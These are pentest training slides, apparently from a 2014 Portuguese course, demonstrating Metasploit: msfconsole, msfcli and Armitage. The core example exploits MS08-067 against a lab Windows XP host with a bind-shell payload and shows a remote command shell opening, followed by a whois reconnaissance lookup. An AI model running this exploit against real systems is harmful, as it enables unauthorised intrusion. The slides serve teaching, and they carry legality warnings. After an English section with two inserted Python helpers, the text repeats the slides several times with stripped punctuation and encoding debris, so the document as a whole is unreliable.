PENTEST
Cerutti – IESGF - 2014
The old-style pentester
• Easy pickings, because it was all new
• Departments were not prepared, and
• It happened easily
Today
Phases of PTEST testing
1. Pre-engagement interactions
2. Intelligence gathering
3. Threat modeling
4. Vulnerability analysis
5. Exploitation
6. Post-exploitation
7. Reporting
Metasploit – exploiting vulnerabilities
• Don't be malicious
• Don't be stupid
• Don't attack targets without written permission
• Consider the consequences of your actions
• If you do things illegally, you can be caught and put in jail
Metasploit
Starting MSFconsole
To launch msfconsole, enter msfconsole at the command line:
    root@bt:~# cd /opt/framework3/msf3/
    root@bt:/opt/framework/msf3# msfconsole
                    < metasploit >
                     ------------
                            \   ,__,
                             \  (oo)____
                                (__)    )\
                                   ||--|| *
    msf >
To access msfconsole's help files, enter help followed by the command which you are interested in. In the next example we are looking for help for the command connect, which allows us to communicate with a host. The resulting documentation lists usage, a description of the tool, and the various option flags.
    msf > help connect
msfcli
It is a fantastic tool for unique exploitation when you know exactly which exploit and options you need. It is less forgiving than msfconsole, but it offers some basic help (including usage and a list of modes) with the command msfcli -h, as shown here:
    root@bt:/opt/framework3/msf3# msfcli -h
    Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
    ==============================================================================
        Mode           Description
        ----           -----------
        (H)elp         You're looking at it baby
        (S)ummary      Show information about this module
        (O)ptions      Show available options for this module
        (A)dvanced     Show available advanced options for this module
        (I)DS Evasion  Show available ids evasion options for this module
        (P)ayloads     Show available payloads for this module
        (T)argets      Show available targets for this exploit module
        (AC)tions      Show available actions for this auxiliary module
        (C)heck        Run the check routine of the selected module
        (E)xecute      Execute the selected module
    root@bt:/opt/framework3/msf3#
Sample Usage
    root@bt:~# msfcli windows/smb/ms08_067_netapi O
    [*] Please wait while we load the module tree...
        Name     Current Setting  Required  Description
        ----     ---------------  --------  -----------
        RHOST    0.0.0.0          yes       The target address
        RPORT    445              yes       Set the SMB service port
        SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
You can see that the module requires three options: RHOST, RPORT, and SMBPIPE. Now, by adding a P, we can check for available payloads:
    root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
    [*] Please wait while we load the module tree...
    Compatible payloads
    ===================
        Name                    Description
        ----                    -----------
        generic/debug_trap      Generate a debug trap in the target process
        generic/shell_bind_tcp  Listen for a connection and spawn a command shell
Having set all the required options for our exploit and selected a payload, we can run our exploit by passing the letter E to the end of the msfcli argument string, as shown here – NEXT SLIDE
REMOTE WINDOWS PROMPT
    root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
    [*] Please wait while we load the module tree...
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Sending stage (240 bytes)
    [*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>
We're successful!
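As an added illustration (not Metasploit's own code and not from the slides), the msfcli argument grammar above, exploit name, option=value pairs and a trailing mode letter, parsed and pre-flighted so that the E and C modes are only accepted against a host inside the written authorisation. The mode letters and the ms08_067_netapi required options are the ones listed above; the scope list, the treatment of the trailing mode as optional and the H default are assumptions.

```python
# Added illustration (not Metasploit code): parse an msfcli argument string
# "<exploit_name> <option=value> ... [mode]" and pre-flight it against an
# authorised-scope list before an E (execute) or C (check) run may touch a host.
import ipaddress
from dataclasses import dataclass, field

# Mode letters as listed by "msfcli -h" on the slide.
MODES = {
    "H": "Help", "S": "Summary", "O": "Options", "A": "Advanced",
    "I": "IDS Evasion", "P": "Payloads", "T": "Targets", "AC": "Actions",
    "C": "Check", "E": "Execute",
}

# Required options and their defaults as reported by
# "msfcli windows/smb/ms08_067_netapi O" on the slide (RHOST has no usable default).
REQUIRED = {"windows/smb/ms08_067_netapi": {"RHOST", "RPORT", "SMBPIPE"}}
DEFAULTS = {"windows/smb/ms08_067_netapi": {"RPORT": "445", "SMBPIPE": "BROWSER"}}


@dataclass
class Invocation:
    module: str
    options: dict
    mode: str
    problems: list = field(default_factory=list)


def parse_msfcli(argv):
    """argv: the tokens after 'msfcli'.

    Assumption: a last token without '=' is the mode letter and the mode is
    optional, defaulting to H (help) so nothing is executed by accident.
    """
    if not argv:
        raise ValueError("missing module name")
    module, rest = argv[0], list(argv[1:])
    mode = "H"
    if rest and "=" not in rest[-1]:
        mode = rest.pop().upper()
    options = {}
    for tok in rest:
        key, sep, val = tok.partition("=")
        if not sep or not key:
            raise ValueError(f"malformed option token: {tok!r}")
        options[key.upper()] = val
    inv = Invocation(module, options, mode)
    if mode not in MODES:
        inv.problems.append(f"unknown mode {mode!r}")
    return inv


def preflight(inv, scope):
    """Reasons this invocation must not run; an empty list means it may proceed.

    scope: CIDR strings taken from the written authorisation (constructed
    by the caller; hypothetical in this example).
    """
    problems = list(inv.problems)
    if inv.mode not in ("E", "C"):
        return problems  # informational modes never contact the target
    effective = {**DEFAULTS.get(inv.module, {}), **inv.options}
    for opt in sorted(REQUIRED.get(inv.module, set())):
        if not effective.get(opt):
            problems.append(f"required option {opt} not set")
    if inv.mode == "E" and not inv.options.get("PAYLOAD"):
        problems.append("PAYLOAD not selected")
    rhost = effective.get("RHOST")
    if rhost:
        try:
            addr = ipaddress.ip_address(rhost)
        except ValueError:
            problems.append(f"RHOST {rhost!r} is not an IP address")
        else:
            nets = [ipaddress.ip_network(n, strict=False) for n in scope]
            # 0.0.0.0 (the slide's placeholder) is never an authorised target.
            if addr.is_unspecified or not any(addr in n for n in nets):
                problems.append(f"RHOST {rhost} is not in the authorised scope")
    return problems


if __name__ == "__main__":
    # The exact argument string from the slide, checked against a constructed scope.
    inv = parse_msfcli(["windows/smb/ms08_067_netapi", "RHOST=192.168.1.155",
                        "PAYLOAD=windows/shell/bind_tcp", "E"])
    print(inv.mode, inv.options, preflight(inv, ["192.168.1.0/24"]))
```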
Running Armitage
To launch Armitage, run the command armitage. During startup, select Start MSF, which will allow Armitage to connect to your Metasploit instance.
    root@bt:/opt/framework3/msf3# armitage
Building up reconnaissance of the environment
Warning!
• If you follow the procedures shown here, you can damage your own system and the target system
• Make sure that the test environment, and only the test environment, is used
• Many examples are destructive and render the target unusable
• The activities described here can be considered ILLEGAL when used UNLAWFULLY or with bad intent
• Follow the rules; don't try to be smarter than the guy who will trace your steps after the event
whois Lookups
    msf > whois secmaniac.net
    [*] exec: whois secmaniac.net
    Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
    Domain Name: SECMANIAC.NET
    Created on: 03-Feb-10
    Expires on: 03-Feb-12
    Last Updated on: 03-Feb-10
    Domain servers in listed order:
    NS57.DOMAINCONTROL.COM
    NS58.DOMAINCONTROL.COM
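The whois record above, parsed into fields, with the two checks a domain owner would run on their own registration (expiry window and nameserver spread). This is an added example, not the msfconsole whois command; the record is constructed from the slide's output and the 30-day warning window is an assumption.

```python
# Added illustration (not Metasploit's whois command): parse the registrar
# whois record shown on the slide and run two registration-hygiene checks.
from datetime import date, datetime

# Constructed from the slide's output.
SAMPLE_WHOIS = """\
[*] exec: whois secmaniac.net
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: SECMANIAC.NET
Created on: 03-Feb-10
Expires on: 03-Feb-12
Last Updated on: 03-Feb-10
Domain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM
"""

DATE_KEYS = {"Created on": "created", "Expires on": "expires",
             "Last Updated on": "updated"}


def parse_date(text):
    # Registrar format "03-Feb-10": day, month abbreviation, two-digit year.
    return datetime.strptime(text.strip(), "%d-%b-%y").date()


def parse_whois(raw):
    """Return {domain, registrar, created, expires, updated, nameservers}."""
    rec = {"nameservers": []}
    in_ns = False
    for line in raw.splitlines():
        line = line.strip()
        if not line or line.startswith("[*]"):
            continue  # skip msfconsole's exec banner
        key, sep, val = line.partition(":")
        if in_ns and not sep:
            rec["nameservers"].append(line.lower())  # bare hostnames
            continue
        in_ns = False
        if not sep:
            continue
        key, val = key.strip(), val.strip()
        if key == "Domain servers in listed order":
            in_ns = True
        elif key == "Domain Name":
            rec["domain"] = val.lower()
        elif key == "Registered through":
            rec["registrar"] = val
        elif key in DATE_KEYS:
            rec[DATE_KEYS[key]] = parse_date(val)
    return rec


def findings(rec, today_iso, warn_days=30):
    """Owner-side checks: expiry within warn_days (assumed threshold) and
    whether every nameserver sits under a single parent zone."""
    today = date.fromisoformat(today_iso)
    out = []
    days = (rec["expires"] - today).days
    if days < 0:
        out.append(f"{rec['domain']} expired {-days} days ago")
    elif days <= warn_days:
        out.append(f"{rec['domain']} expires in {days} days")
    ns = rec["nameservers"]
    parents = {h.split(".", 1)[1] for h in ns if "." in h}
    if len(ns) < 2:
        out.append("fewer than two nameservers listed")
    elif len(parents) == 1:
        out.append(f"all nameservers under one parent zone ({parents.pop()})")
    return out


if __name__ == "__main__":
    record = parse_whois(SAMPLE_WHOIS)
    print(record)
    print(findings(record, "2012-01-20"))
```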
Pentester antigo
bull Facilidades pela novidadebull Departamentos natildeo estavam preparados ebull Acontecia facilmente
Hoje
Fases dos testes de PTEST
1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Hoje
Fases dos testes de PTEST
1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Fases dos testes de PTEST
1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
